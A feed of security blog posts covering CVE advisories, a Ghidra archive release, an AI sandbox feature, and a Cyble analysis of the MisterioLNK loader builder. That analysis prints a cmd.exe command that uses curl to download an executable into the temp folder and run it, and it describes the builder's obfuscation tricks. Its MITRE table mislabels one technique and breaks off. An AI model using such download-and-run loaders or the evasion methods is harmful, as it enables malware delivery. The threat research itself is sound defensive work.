Ghidra data type archive for Windows driver functions

October 10, 2024/in Company Blogs

While reverse-engineering Windows drivers with Ghidra, it is common to encounter a function or data type that is not recognized during disassembly.

This is because Ghidra does not natively include the majority of the definitions for data types and functions used by Windows drivers.

Thankfully, these problems can usually be solved by importing Ghidra data type archive files (.gdt) that contain the relevant definitions.

However, it is not uncommon that the definitions in question aren’t available in a preexisting .gdt file, meaning a new definition must be created manually. Additionally, in some cases, the function or data type may be undocumented by Microsoft, making the process of creating a new definition a more tedious process.

To aid analysts in reverse engineering Windows drivers, Cisco Talos is releasing a GDT file on GitHub that contains various definitions for functions and data types that have been created as needed during our analysis of malicious drivers, as they were not present in the commonly used data type archives.

It is important to note that this archive is not intended to contain all undocumented Windows functions or serve as a replacement for other available data type archives, but as a supplement to them. This is a long-term project that will continue to grow when new definitions are created by our analysts and added to the public release.

The archive can be found here on our GitHub repository.

Cisco Talos Blog – Read More

CISA Issues Urgent Advisory on Critical Vulnerabilities in Ivanti Products

October 10, 2024/in Company Blogs

Overview

The Cybersecurity and Infrastructure Security Agency (CISA) has issued a critical advisory report on vulnerabilities disclosed in multiple Ivanti products. These products include Ivanti Endpoint Manager Mobile (EPMM), Ivanti Cloud Service Application (CSA), Ivanti Velocity License Server, Ivanti Connect Secure, Policy Secure, and Ivanti Avalanche.

The official advisory from Ivanti specifically addresses various vulnerabilities affecting the Ivanti Cloud Service Application (CSA). It highlights that a limited number of customers using CSA versions 4.6 patches 518 and earlier have been exploited when certain vulnerabilities—CVE-2024-9379, CVE-2024-9380, or CVE-2024-9381—are chained with CVE-2024-8963.

The recent advisory from Ivanti has indicated a range of vulnerabilities across their product lines, all requiring urgent attention.

Details of Ivanti Vulnerabilities

CVE-2024-7612, classified as high severity with a score of 8.8, affects Ivanti EPMM (Core) versions 12.1.0.3 and earlier. This vulnerability involves incorrect permission assignment, allowing local authenticated attackers to access or modify sensitive configuration files without proper authorization. If exploited, this could lead to severe security breaches.

Another vulnerability, CVE-2024-9379, has been categorized as medium severity with a CVSS score of 6.5. This SQL injection vulnerability affects Ivanti CSA (Cloud Services Appliance) versions 5.0.1 and earlier, allowing remote authenticated attackers with admin privileges to execute arbitrary SQL statements through the admin web console.

Furthermore, CVE-2024-9380, an OS command injection vulnerability also affecting Ivanti CSA, is rated high with a score of 7.2. This flaw enables remote authenticated attackers to gain unauthorized access and execute commands on the operating system via the admin web console.

Additionally, CVE-2024-37404 is a critical vulnerability with a CVSS score of 9.1, impacting both Ivanti Connect Secure and Policy Secure. This flaw allows a remote authenticated attacker to achieve remote code execution due to improper input validation in the admin portal of vulnerable versions.

The vulnerabilities in CISA’s Known Exploited Vulnerabilities (KEV) catalog signify the need for immediate action. When vulnerabilities appear on this list, it indicates that threat actors could exploit them to target unsuspecting victims. Attackers can utilize these vulnerabilities for data breaches, ransomware attacks, and privilege escalation, posing risks to organizations.

Recommendations and Mitigations

To mitigate these risks effectively, organizations must take proactive measures. Some of the mitigation strategies include:

Regularly update all software and hardware systems with the latest patches released by the vendor to significantly reduce the risk of exploitation.

Create a routine schedule for patch applications, ensuring that critical patches are prioritized to maintain system security.

Include inventory management, patch assessment, testing, deployment, and verification.

Automate the process wherever possible to enhance efficiency and consistency.

Divide networks into distinct segments to isolate critical assets from less secure areas.

Reduce the attack surface by minimizing potential vulnerabilities.

Outline procedures for detecting, responding to, and recovering from security incidents.

Regularly test and update the plan to ensure its effectiveness and alignment with current threats.

Implement comprehensive monitoring to detect and analyze suspicious activities.

Use Security Information and Event Management (SIEM) systems for aggregating and correlating logs for real-time threat detection and response.

Conclusion

By adopting these strategies, organizations can reduce their vulnerability to exploitation and enhance their overall security posture. The proactive measures highlighted in this advisory are essential for protecting sensitive information and maintaining system integrity in an increasingly hostile internet. Immediate action is required to mitigate the risks posed by these vulnerabilities and ensure that organizational assets are safeguarded against potential threats.

The post CISA Issues Urgent Advisory on Critical Vulnerabilities in Ivanti Products appeared first on Cyble.

Blog – Cyble – Read More

Vulnerability in popular PDF reader could lead to arbitrary code execution; Multiple issues in GNOME project

October 9, 2024/in Company Blogs

Cisco Talos’ Vulnerability Research team recently disclosed six new security vulnerabilities across a range of software, including one in a popular PDF reader that could lead to arbitrary code execution.

Foxit PDF Reader, one of the most popular alternatives to Adobe Acrobat, contains a memory corruption vulnerability that could allow an adversary to execute code on the targeted machine.

Talos also discovered three vulnerabilities in Veertu’s Anka Build, a suite of software designed to test macOS or iOS applications in CI/CD environments.

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.

Use-after-free vulnerability in Foxit PDF Reader

Discovered by KPC.

A use-after-free vulnerability in Foxit PDF Reader could lead to memory corruption and eventually arbitrary code execution on the targeted machine.

TALOS-2024-1967 (CVE-2024-28888) can be triggered if an adversary tricks a user into opening a specially crafted PDF that contains malicious JavaScript. Exploitation could also occur if the targeted user visits an attacker-controlled website with the Foxit PDF Reader browser extension enabled.

Multiple vulnerabilities in GNOME project library could lead to code execution

Two vulnerabilities in the G Structured File Library (libgsf) could lead to arbitrary code execution.

This GNOME project supports an abstraction layer around different structure file formats such as .tar and .zip.

TALOS-2024-2068 (CVE-2024-36474) is an integer overflow vulnerability that could allow an out-of-bounds index to be used when reading and writing to an array. This could lead to arbitrary code execution if an adversary exploited it appropriately.

TALOS-2024-2069 (CVE-2024-42415) works similarly, but in this case, it arises when the software processes the sector allocation table.

An adversary could exploit both these vulnerabilities by tricking the targeted user into opening a malicious, specially crafted file.

Three vulnerabilities in Veertu Anka Build

Discovered by KPC.

Veertu’s Anka Build software contains three vulnerabilities, two of which are directory traversal issues.

Anka Build is a suite of software designed to test macOS and iOS applications in CI/CD environments. The suite is a centralized dashboard for managing nodes, VM instances, templates, tags and logs.

This software contains two directory traversal vulnerabilities — TALOS-2024-2059 (CVE-2024-41163) and TALOS-2024-2061 (CVE-2024-41922) — that could lead to the disclosure of arbitrary files. An adversary could exploit these vulnerabilities by sending the target a specially crafted HTTP request.

Another vulnerability, TALOS-2024-2060 (CVE-2024-39755), is a privilege escalation issue that could allow a low-privileged user to force the software to update, potentially raising their access to that of a root user.

Cisco Talos Blog – Read More

OEMs Are Urged to Address Vulnerabilities in Device Communication

October 9, 2024/in Company Blogs

Overview

Qualcomm has shared its October 2024 Security Bulletin, highlighting multiple vulnerabilities. Google’s Threat Analysis Group has also denoted the exploitation of a critical vulnerability, CVE-2024-43047, in targeted attacks. The vulnerability revolves around the FASTRPC driver, which plays an important role in device communication processes. Exploitation of this vulnerability can lead to severe security breaches, potentially allowing unauthorized access to sensitive data.

Considering this, original equipment manufacturers (OEMs) have received patches designed to rectify this flaw, and they are strongly encouraged to implement these updates without delay. Users concerned about the implications of this vulnerability should contact their device manufacturers for specific patch details and guidance.

Google has publicly acknowledged the contributions of various researchers who have been instrumental in identifying and reporting several critical security flaws. Among these notable contributions is CVE-2024-33066, identified by Claroty Research in partnership with Trend Micro. This collaboration highlights the importance of teamwork in discovering and mitigating potential threats.

Another key vulnerability, CVE-2024-21455, was reported by Seth Jenkins from Google Project Zero, demonstrating the ongoing commitment of researchers to enhance security measures across various platforms. Additionally, Xiling Gong identified CVE-2024-38399, further contributing to the collective knowledge needed to protect users against cybersecurity threats.

Most prominently, CVE-2024-43047 was brought to light by a team that included Seth Jenkins, Conghui Wang, and the Amnesty International Security Lab.

Overview of Vulnerabilities and Patches

Recent vulnerability assessments have revealed a concerning mix of high- and moderate-impact vulnerabilities across proprietary and open-source software. Understanding the nature and severity of these vulnerabilities is critical for grasping their potential impact on device security.

Among the high-impact vulnerabilities, CVE-2024-33066, associated with the WLAN Resource Manager, stands out. This critical flaw was reported on September 6, 2023, and has been assigned a CVSS score of 9.8, indicating its severe nature. Another vulnerability is CVE-2024-21455, related to the DSP Service. Reported on June 11, 2024, it carries a high-security rating with a CVSS score of 8.0.

Moderate impact vulnerabilities have also been identified, including CVE-2024-23375, which relates to the Radio Interface Layer. This issue was flagged on November 27, 2023, and is rated medium with a CVSS score of 5.5. Another moderate vulnerability, CVE-2024-38425, related to performance, was reported on January 23, 2024.

A detailed analysis of critical vulnerabilities reveals specific challenges that need to be addressed. For instance, CVE-2024-33064 involves a buffer over-read in WLAN host communication, which could allow for information disclosure during data transmission. Another vulnerability, CVE-2024-33069, is characterized as a “Use After Free” issue that can lead to a transient denial of service, disrupting communication between devices. Additionally, CVE-2024-38399 highlights a similar “Use After Free” vulnerability in graphics processing, which can result in memory corruption and negatively impact device functionality.

Moreover, vulnerabilities related to multimedia and power management integrated circuits (ICs) require attention, as they pose risks to device integrity and user privacy.

Conclusion

The ongoing battle against cybersecurity threats requires a collective effort from researchers, manufacturers, and users alike. As demonstrated by the vulnerabilities highlighted in the latest report from Google’s Threat Analysis Group, proactive measures and timely patch implementations are key to maintaining secure systems.

Recommendations and Mitigations

Users should stay informed about vulnerabilities affecting their devices.

Regular updates and patch installations are crucial for mitigating risks associated with known vulnerabilities.

Engaging with device manufacturers for patch information is essential.

Timely updates can significantly reduce the potential for exploitation.

Manufacturers must prioritize the deployment of patches.

Quick implementation of security measures protects end-users.

Prompt action also upholds manufacturers’ reputations in a security-conscious market.

The post OEMs Are Urged to Address Vulnerabilities in Device Communication appeared first on Cyble.

Blog – Cyble – Read More

Security Updates for Adobe FrameMaker: Addressing Critical Vulnerabilities

October 9, 2024/in Company Blogs

Overview

Adobe has released new updates across several of its products, including Adobe FrameMaker, Adobe Substance 3D Printer, Adobe Commerce and Magento Open Source, Adobe Dimension, Adobe Animate, Adobe Lightroom, Adobe InCopy, Adobe InDesign, and Adobe Substance 3D Stager. The primary reason for these updates is the swarm of vulnerabilities across Adobe products, as covered by the Cybersecurity and Infrastructure Security Agency (CISA), as these updates address critical vulnerabilities that could allow malicious actors to execute arbitrary codes on affected systems. Although Adobe has stated that it is not aware of any exploits in the wild targeting these vulnerabilities, the potential risks necessitate immediate action from users to secure their installations.

The vulnerabilities identified impact various versions of Adobe products, specifically those running on Windows platforms. For Adobe FrameMaker, the affected versions include FrameMaker 2020 Release: Update 6 and earlier, as well as FrameMaker 2022 Release: Update 4 and earlier. Adobe Substance 3D Printer is also affected, with versions 1.0.3 and earlier being vulnerable.

Additionally, Adobe Commerce and Magento Open Source have vulnerabilities in Magento Open Source 2.4.6-p1 and earlier, as well as Magento Open Source 2.4.5-p2 and earlier. For Adobe Dimension, versions 3.4.2 and earlier are impacted. Adobe Animate has vulnerabilities in version 23.0.0 and earlier, while Adobe Lightroom users should be aware that Lightroom Classic 12.3 and earlier are also affected. Furthermore, Adobe InCopy and Adobe InDesign have vulnerabilities in their 2023 Release: Update 4 and earlier versions. Finally, Adobe Substance 3D Stager users should note that version 2.2 and earlier are at risk.

Adobe has classified these updates with a priority rating of 3, highlighting the need for users to take action. For mitigation against potential attacks, users are encouraged to update their installations to the latest versions. For Adobe FrameMaker, users should upgrade to FrameMaker 2020 Update 7 or FrameMaker 2022 Update 5. The recommended version for Adobe Substance 3D Printer is 1.0.4 or later. Users of Adobe Commerce and Magento Open Source should update to Magento Open Source 2.4.6-p2 or later.

For those using Adobe Dimension, the update to version 3.4.3 or later is recommended. Adobe Animate users should upgrade to version 23.0.1 or later. Adobe Lightroom Classic users need to move to version 12.4 or later. InCopy users should update to the 2023 Release: Update 5, and InDesign users are advised to upgrade to the 2023 Release: Update 5 as well. Finally, for Adobe Substance 3D Stager, users should update to version 2.3 or later.

Vulnerability Details and Acknowledgments

In Adobe FrameMaker, the first vulnerability is categorized as an Out-of-Bounds Read (CWE-125), which could lead to arbitrary code execution. This vulnerability has been assigned a critical severity rating with a CVSS base score of 7.8, identified as CVE-2024-47421. Another critical issue is the Untrusted Search Path vulnerability (CWE-426), which also allows for arbitrary code execution and sharing the same CVSS base score and severity, noted as CVE-2024-47422.

The third vulnerability involves the Unrestricted Upload of Files with Dangerous Type (CWE-434), which again could allow for arbitrary code execution, rated as critical with a CVSS base score of 7.8 (CVE-2024-47423). Another critical risk is associated with Integer Overflow or Wraparound (CWE-190), which can also lead to arbitrary code execution, rated with the same CVSS score (CVE-2024-47424). Lastly, Integer Underflow (Wrap or Wraparound) (CWE-191) is another critical vulnerability allowing arbitrary code execution, also carrying a CVSS base score of 7.8 (CVE-2024-47425).

The presence of these vulnerabilities across widely used Adobe products poses risks for users. Arbitrary code execution could allow attackers to gain control of affected systems, leading to unauthorized access to sensitive data, data breaches, or other forms of exploitation. Prompt updates to the latest software versions are essential in protecting user systems from such threats.

Adobe has expressed gratitude to the security researchers and organizations that have collaborated to identify and analyze these vulnerabilities. The individuals who have been instrumental in reporting the relevant issues include yjdfy, who reported CVE-2024-47424 and CVE-2024-47425; Sidhu (someonealt-86), who reported CVE-2024-47423; jony_juice, who reported CVE-2024-47422; and Francis Provencher (prl), who reported CVE-2024-47421.

Conclusion

The vulnerabilities addressed in the recent updates highlight the collective effort required to create a more secure environment. By remaining vigilant and proactive in applying updates and adhering to best practices, users can contribute to protecting their systems and data from online threats.

Recommendations and Mitigations

To mitigate against these vulnerabilities, Cyble recommends these recommendations and mitigation strategies:

Regularly monitor security bulletins and subscribe to newsletters for timely information on vulnerabilities and updates.

Promptly applying patches can mitigate risks associated with known vulnerabilities.

Users are encouraged to engage with manufacturers for clarification on updates and security measures.

Organizations utilizing Adobe products should educate employees about cybersecurity best practices.

Continuously monitor systems for unusual activity to identify potential exploits before they escalate.

Implement additional security measures, such as firewalls and antivirus software, to further safeguard sensitive information.

The post Security Updates for Adobe FrameMaker: Addressing Critical Vulnerabilities appeared first on Cyble.

Blog – Cyble – Read More

Authentication codes from a service you don’t have an account with | Kaspersky official blog

October 9, 2024/in Company Blogs

We’ve previously covered what to do if you receive an unexpected one-time login code for one of your accounts (spoiler alert: it’s probably a hacking attempt, and it’s time to consider getting reliable protection for all your devices).

But sometimes the situation is different: you get a two-factor authentication code for a service where you’ve never had an account. In this post, we’ll discuss why this might happen, and how to react to such messages.

Why you might receive a code for an unknown account

There are two basic explanations for receiving one-time login codes for an account you’re certain doesn’t belong to you.

The first and most likely explanation: before you got your current phone number, it belonged to someone else. When they canceled their service, the number went back into circulation and eventually landed with you. This is called “phone number recycling” — a standard practice for mobile service providers.

Thus, the previous owner of your number registered an account using it. And now, either they’re trying to log in, or someone else is attempting to hack their account. As a result, one-time login codes are being sent to the number (which now belongs to you).

The less likely scenario is that someone is unintentionally trying to register an account using your phone number. Perhaps they mistyped their own number, or simply entered a random sequence of digits that happened to be yours.

What to do

No matter which of the above scenarios may have occurred, the good news is it’s not your problem. You don’t need to do anything and there’s nothing to worry about — unless you plan on creating an account with that service. If you do, you might run into a problem: your number is already associated with an existing (albeit abandoned) account. In that case, contact the service’s support team and explain the situation, and ask them to detach the unknown account from your number while mentioning that you’re a potential new customer.

If support can’t or won’t help, there’s nothing you can do except get an extra SIM card and link your account to the new number.

What NOT to do

Now, let’s talk about what you absolutely should not do: under no circumstances should you attempt to use the one-time codes you receive to access an account that doesn’t belong to you. Curiosity killed the cat, and in this case it could have serious consequences.

Accessing someone else’s account isn’t just unethical; it’s illegal in most jurisdictions. For example, in the U.S., the very strict Computer Fraud and Abuse Act (CFAA, 18 U.S.C. § 1030), covers this. Germany has a Section 202 of its Criminal Code (StGB $ 202), and the list goes on for most if not all countries worldwide. Although the probability of facing legal consequences for accessing someone else’s account may not be high, it’s not worth the risk.

Keep in mind that this probability increases significantly if the account is linked to illegal activity. In that case, law enforcement might take a keen interest in anyone who accesses the account, and sooner or later you could find yourself facing some very uncomfortable questions.

So, the best course of action when receiving a text message with a one-time login code for an account that doesn’t belong to you is to simply ignore it. And to avoid any unnecessary trouble, absolutely do not try to log in to someone else’s account.

Kaspersky official blog – Read More

Private AI Assistant for Malware Analysis in ANY.RUN Sandbox

October 9, 2024/in Company Blogs

We are excited to announce the release of an updated AI assistant, which brings powerful analysis capabilities right to your private sessions in the ANY.RUN sandbox. With our new assistant, we’ve taken things to the next level by combining deep, insightful analysis with the privacy and security you need.

AI Reports Are Now Available for Private Sessions

Previously, our AI assistant (powered by ChatGPT) was only accessible in public sandbox sessions. Now, it has been replaced with a new AI model fully hosted on our own infrastructure, allowing Hunter and Enterprise users to enjoy AI insights securely in private mode as well.

AI reviews inside ANY.RUN’s sandbox analysis session

With the updated version, you get detailed insights without any risk of your information being shared with third parties. Everything stays within your private session, so you can confidently analyze sensitive files and links with full privacy.

How AI Assistant Helps with Malware Analysis

Inside ANY.RUN’s sandbox, you’ll now find the AI button next to processes, Suricata rules, as well as other key elements in your analysis session.

Click the AI button next to processes, events, and other elements to generate AI reports

By clicking the AI button, you can get detailed insights about what each element does in that specific context. This feature is designed to give you a clearer understanding of malicious behavior, speeding up your investigations and providing helpful summaries in real time.

Here’s what AI assistant can do for you:

1. Process trees: The AI assistant digs into the process tree, identifies suspicious behavior and offers summaries of each process, helping users focus on critical areas of interest.

Analysis of processes by AI

2. Command line: It scans command line inputs, pinpointing potential indicators of malicious activity, and generates a detailed report to guide your investigation.

Command line analyzed by AI

3. Suricata rule triggers: When Suricata rules are triggered, the AI assistant provides a clear explanation of what these triggers mean in the context of your security, helping you understand the potential threat level.

Suricata rule analyzed by AI assistant

4. HTTP connections: The assistant reviews HTTP connections, summarizing any suspicious behaviors or connections that may pose a risk to your network.

HTTP requests analyzed by AI

5. Registry changes: The assistant flags unusual changes in the system registry, highlighting actions that could signal a malware threat.

Registry changes analyzed by AI inside ANY.RUN

AI Summary Button: A Quick Threat Overview at Your Fingertips

After analyzing various elements inside the session with AI, you can view all the generated reports conveniently through the AI Summary button.

You can find the AI Summary button in the top right corner of your sandbox session

This button, located in the top right corner of your ANY.RUN sandbox session, compiles all the AI reviews you’ve generated for processes, Suricata rules, and other components.

By clicking the AI Summary button, you get a quick and comprehensive overview of your analysis in one place, making it easy to see everything the AI has helped you review and understand during the session.

Conclusion

With the addition of the AI assistant in private mode, you can benefit from AI-driven insights, summaries, and explanations while ensuring that your sensitive data remains completely protected.

See more recent updates from ANY.RUN in the September 2024 release notes.

About ANY.RUN

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.

With ANY.RUN you can:

Detect malware in seconds

Interact with samples in real time

Save time and money on sandbox setup and maintenance

Record and study all aspects of malware behavior

Collaborate with your team

Scale as you need

Request free trial of ANY.RUN’s products →

The post Private AI Assistant for Malware Analysis <br>in ANY.RUN Sandbox appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – Read More

Largest Patch Tuesday since July includes two exploited in the wild, three critical vulnerabilities

October 8, 2024/in Company Blogs

The largest Microsoft Patch Tuesday since July includes two vulnerabilities that have been exploited in the wild and three other critical issues across the company’s range of hardware and software offerings.

October’s monthly security update from Microsoft includes fixes for 117 CVEs, the most in a month since July’s updates covered 142 vulnerabilities.

The two vulnerabilities that Microsoft reports have been actively exploited in the wild and are publicly known are both rated as only being of “moderate” severity.

CVE-2024-43572 is a remote code execution vulnerability in the Microsoft Management Console that could allow an attacker to execute arbitrary code on the targeted machine. Microsoft’s security update will prevent untrusted Microsoft Saved Console (MSC) files from being opened to protect users against adversaries trying to exploit this vulnerability.

The security update will prevent untrusted Microsoft Saved Console (MSC) files from being opened to protect customers against the risks associated with this vulnerability.

The other vulnerability that was exploited in the wild in this week’s security update is CVE-2024-43573, a platform spoofing vulnerability in Windows MSHTML. Platform spoofing vulnerabilities usually allow an adversary to gain unauthorized access to an environment by disguising themselves as a trusted source.

CVE-2024-43583, an elevation of privilege vulnerability in Winlogon, has also been publicly disclosed, according to Microsoft, but has not yet been exploited in the wild. This vulnerability could allow an attacker to obtain SYSTEM-level privilege. In addition to applying the patch, Microsoft also recommends users enable a Microsoft first-party Input Method Editor (IME) on their devices to prevent adversaries from being able to exploit third-party IMEs during the sign-in process.

October’s Patch Tuesday also includes three critical vulnerabilities that could all lead to remote code execution.

CVE-2024-43468 is the most serious of this bunch, with a CVSS severity score of 9.8 out of 10. An attacker could exploit this vulnerability in Microsoft Configuration Manager to execute commands on the targeted server or underlying database.

Another remote code execution vulnerability, CVE-2024-43488, exists in the Visual Studio Code extension for Arduino, an open-source platform for building and managing single-board microcontrollers and microcontroller kits. A missing authentication protocol could allow an adversary to execute remote code over the network.

Microsoft stated that the company has already mitigated this vulnerability and users do not need to take any additional steps. This extension has also been deprecated and can no longer be downloaded from the internet.

Lastly, CVE-2024-43582 exists in the Windows Remote Desktop Protocol server and could allow an attacker to execute code on the server side with the same permissions as the RPC service. An adversary could exploit this vulnerability by sending malformed packets to an RPC host. However, exploitation also requires that the adversary win a race condition first.

Cisco Talos would also like to highlight several vulnerabilities that are only rated as “important,” but Microsoft lists as “more likely” to be exploited:

CVE-2024-43502: Elevation of privilege vulnerability in Windows Kernel CVE-2024-43509 and CVE-2024-43556: Elevation of privilege vulnerabilities in Windows Graphics Component CVE-2024-43560: Elevation of privilege vulnerability in Windows Storage Port CVE-2024-43581 and CVE-2024-43615: Remote code execution vulnerability in Microsoft OpenSSH for Windows CVE-2024-43609: Spoofing vulnerability in Microsoft Office

A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page.

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 64083 – 64086, 64089, 64090, 64111 and 64112. There are also Snort 3 rules 301034 – 301036 and 301041.

Cisco Talos Blog – Read More

Apple Issues Urgent Security Advisory for iOS and iPadOS Vulnerabilities

October 8, 2024/in Company Blogs

Overview

Apple has released a new security advisory highlighting the issues affecting Apple’s iOS and iPadOS platforms. As detailed in the advisory, two vulnerabilities have been identified, both of which affect Apple iOS and iPadOS up to version 18.0. The vendor is Apple, and patches are available for these vulnerabilities.

The first vulnerability, CVE-2024-44204, relates to information disclosure and has been assigned a CVSSv3.1 score of 5.5, indicating a medium severity level. This vulnerability allows saved passwords to be read aloud by the VoiceOver feature, posing a significant privacy risk for users on affected iOS and iPadOS versions. A patch is available for this vulnerability.

The second vulnerability, CVE-2024-44207, also relates to information disclosure, with a CVSSv3.1 score of 4.3, again indicating medium severity. This issue affects audio messages in the Messages app, enabling a few seconds of audio capture before the microphone indicator activates. Such a flaw could result in unintended recordings. A security patch for this vulnerability is also available.

Apple has indicated that security updates addressing these vulnerabilities are included in the recent releases of iOS 18.0.1 and iPadOS 18.0.1.

Patch Details and Impact

The updates were released on October 3, 2024, and they specifically target a range of Apple devices. The vulnerability CVE-2024-44207 affects all iPhone 16 models, while CVE-2024-44204 impacts several devices, including the iPhone XS and later models, as well as various iPad Pro models (specifically the 13-inch and 12.9-inch 3rd generation and later), the iPad Air (3rd generation and later), and the iPad mini (5th generation and later).

Apple emphasizes the critical importance of security and maintains a policy of not disclosing details about vulnerabilities until a thorough investigation has been completed and patches are available. To enhance transparency, the vulnerabilities are referenced by their CVE IDs in Apple’s official documentation.

In a statement concerning the security content of the updates, Apple noted, “About the security content of iOS 18.0.1 and iPadOS 18.0.1. This document describes the security content of the updates.”

Historically, Apple products have been prime targets for cybercriminals who exploit vulnerabilities for various motives, including espionage and financial gain. The recent vulnerabilities discovered in iOS and iPadOS versions put sensitive user information at risk, highlighting the urgent need for immediate patching to protect against potential exploits.

Conclusion

The vulnerabilities identified in Apple’s iOS and iPadOS are a stark reminder of the evolving cybersecurity landscape. As cyber threats become increasingly sophisticated, users must prioritize the application of security patches to protect their sensitive information.

Recommendations and Mitigations

To mitigate the risks associated with these vulnerabilities, users are strongly advised to:

Regularly check for and install the latest security updates from Apple to ensure your devices are protected against known vulnerabilities.

Activate automatic updates on your devices to ensure that you receive security patches as soon as they are released, minimizing the risk of exposure.

Regularly review the permissions granted to apps, particularly those that access sensitive information, to ensure they align with your privacy preferences.

Keep an eye on the activity logs and alerts on your devices for any unusual access or behavior that could indicate a breach.

Take advantage of built-in security features such as Face ID, Touch ID, and two-factor authentication to enhance the protection of your devices.

The post Apple Issues Urgent Security Advisory for iOS and iPadOS Vulnerabilities appeared first on Cyble.

Blog – Cyble – Read More

MisterioLNK: The Open-Source LNK Loader Builder Behind Malicious Loaders

October 8, 2024/in Company Blogs

Cyble Research and Intelligence Labs (CRIL) has uncovered a new, previously undetected loader builder known as “MisterioLNK.” This discovery follows our earlier analysis of Quantum Software, another LNK file-based builder that has been gaining traction in the cyber landscape. MisterioLNK, available on GitHub, presents a significant challenge to security defenses, as files generated by this tool currently exhibit minimal or zero detection rates by conventional security systems.

As described on GitHub, MisterioLNK is an open-source loader builder that leverages Windows script engines to execute malicious payloads while employing obfuscation as well. It is crafted to operate discreetly, downloading files into temporary directories before launching them, thereby enhancing its evasive capabilities and making detection by traditional security measures difficult.

Key features of MisterioLNK include support for five loader methods—HTA, BAT, CMD, VBS, and LNK— as well as three obfuscation methods specifically for VBS, CMD, and BAT, with plans to add support for HTA obfuscation soon. Additionally, the tool supports customizing the icon of LNK files.

The project is currently in its beta phase, and the author has cautioned that bugs and issues may exist. They encourage users to report any problems via the GitHub Issues page. Furthermore, the author disclaims any responsibility for illegal activities conducted using this software, emphasizing that users must ensure their actions comply with relevant laws and regulations. The figure below shows the GitHub post by the developer.

Threat Actors (TAs) have started utilizing the MisterioLNK loader builder to generate obfuscated files for deploying malware, such as Remcos RAT, DC RAT, and BlankStealer. Alarmingly, these loaders are largely evading detection, with many remaining undetected by most security vendors.

For our research, we generated all combinations of the loader files to evaluate their detection capabilities. The samples created using the MisterioLNK builder revealed that out of six files, only one was detected with 16 detections, two files had one detection each, and three files showed zero detections. While security vendors are successfully detecting LNK and Obfuscated VBS loaders produced by this builder, the detection rates for BAT, CMD, HTA, and VBS loader files remain low, as shown in the figure below.

Technical Details

Misterio.exe, a .NET-based tool, consists of two primary modules: a loader builder and an obfuscator. The builder accepts a URL hosting a malicious second-stage payload and generates BAT, CMD, HTA, LNK, or VBS files based on the user’s selection. The generated files are designed to connect to the URL, download the payload, and execute it. Additionally, the builder can obfuscate BAT, CMD, and VBS loader files while allowing custom icons to be added. The figure below illustrates the Misterio Dropper.

BAT/CMD Loader and Obfuscator

The BAT/CMD loader generated by the builder is designed to download files from specified URLs using the `curl` command, followed by executing the downloaded files. The resulting script is saved with a custom file icon for enhanced deception. When obfuscation is enabled, the script undergoes an additional layer of concealment.

The obfuscation module uses a technique that inserts random strings between characters in the batch code. It processes each line of the script by appending random strings, enclosed in percent signs (%), to characters that are not already within percent signs. This approach introduces seemingly random data into the code to confuse static analysis tools while still allowing the script to run without issues. Additionally, a comment line is added at the start of the script, indicating that it was processed by “MisterioLNK.”

HTA Loader:

The HTA (HTML Application) loader generated by the builder utilizes JavaScript and ActiveX objects to execute commands for downloading and running files. While the obfuscation feature for HTA files is currently inactive, it could be implemented in the future. This approach creates an HTML file with embedded script content designed to execute seamlessly upon launch.

VBS Loader and Obfuscator:

The VBS Loader leverages a shell object to execute commands for downloading and running the target file. It supports obfuscation to enhance its stealth capabilities. The obfuscation process converts each character of the VBScript into its ASCII code representation using the `Chr()` function, resulting in a series of concatenated `Chr()` calls that reconstruct the original characters when executed. The obfuscated script is then encapsulated within an `Execute()` function, which evaluates and runs the concealed code. This approach effectively obscures the script’s logic, making it difficult for static analysis tools to interpret.

LNK Loader Builder:

The tool creates a shortcut file (.lnk) that, upon execution, triggers a command to download and run the target file. It also supports setting a custom icon for the LNK file to enhance its disguise. The target command created by the link builder is “C:Windowssystem32cmd.exe /c mode 15,1 & curl hxxps://live.sysinternals.com/du.exe -o %temp%ntvy4adp.exe & start /b %temp%ntvy4adp.exe”. The figure below shows the properties of the LNK file.

Together, these modules form a powerful toolkit for generating and concealing scripts that can deliver and execute payloads with minimal detection. Their design emphasizes flexibility, adaptability, and evasion, making them potent tools in the context of threat development while also highlighting the potential risks if misused.

Conclusion

MisterioLNK is a versatile loader builder designed to create and conceal scripts that download and execute payloads using various Windows script engines. With support for multiple file formats (BAT, CMD, HTA, VBS, and LNK) and advanced obfuscation techniques, MisterioLNK effectively evades detection by traditional security tools. While currently in beta, its adaptability and focus on evasion make it a significant threat in the cybersecurity landscape. The project’s open-source nature and disclaimers about legal responsibility highlight the potential for misuse.

Our Recommendations

Implement security solutions that can recognize and detect the specific obfuscation patterns and script formats generated by MisterioLNK Builder.

Use software restriction policies or application whitelisting to limit the execution of unauthorized scripts and reduce the attack surface for loaders like MisterioLNK.

Focus on behavioral detection strategies to identify suspicious activities, like the use of scripting engines to download and execute files, regardless of obfuscation.

Educate users about the risks associated with executing files from unknown or untrusted sources, emphasizing the dangers of seemingly benign shortcut files (.lnk).

MITRE ATT&CK® Techniques

Tactic
Technique
Procedure

Execution (TA0002)
User Execution: Malicious File (T1204.002)
MisterioLNK utilizes multiple script formats (BAT, CMD, HTA, VBS, LNK) that rely on user interaction to execute the payload, typically by tricking users into running the loader file.

Execution (TA0002)
Command and Scripting Interpreter (T1059)
Uses scripting languages like BAT, CMD, and VBS to execute commands on the target system.

Execution (TA0002)
Command and Scripting Interpreter: Visual Basic (T1059.005)
Deploys obfuscated VBScript files that execute commands to download and run additional payloads.

Execution (TA0002)
Command and Scripting Interpreter: Visual Basic (T1059.003)
Relies on the Windows command line (cmd.exe) to issue commands for file downloads and execution.

Defence Evasion (TA0005)
Masquerading: Masquerade File Type (T1036.008)
Uses LNK files with altered icons to disguise the loader as a legitimate file, increasing the likelihood of user interaction.

Defence Evasion (TA0005)
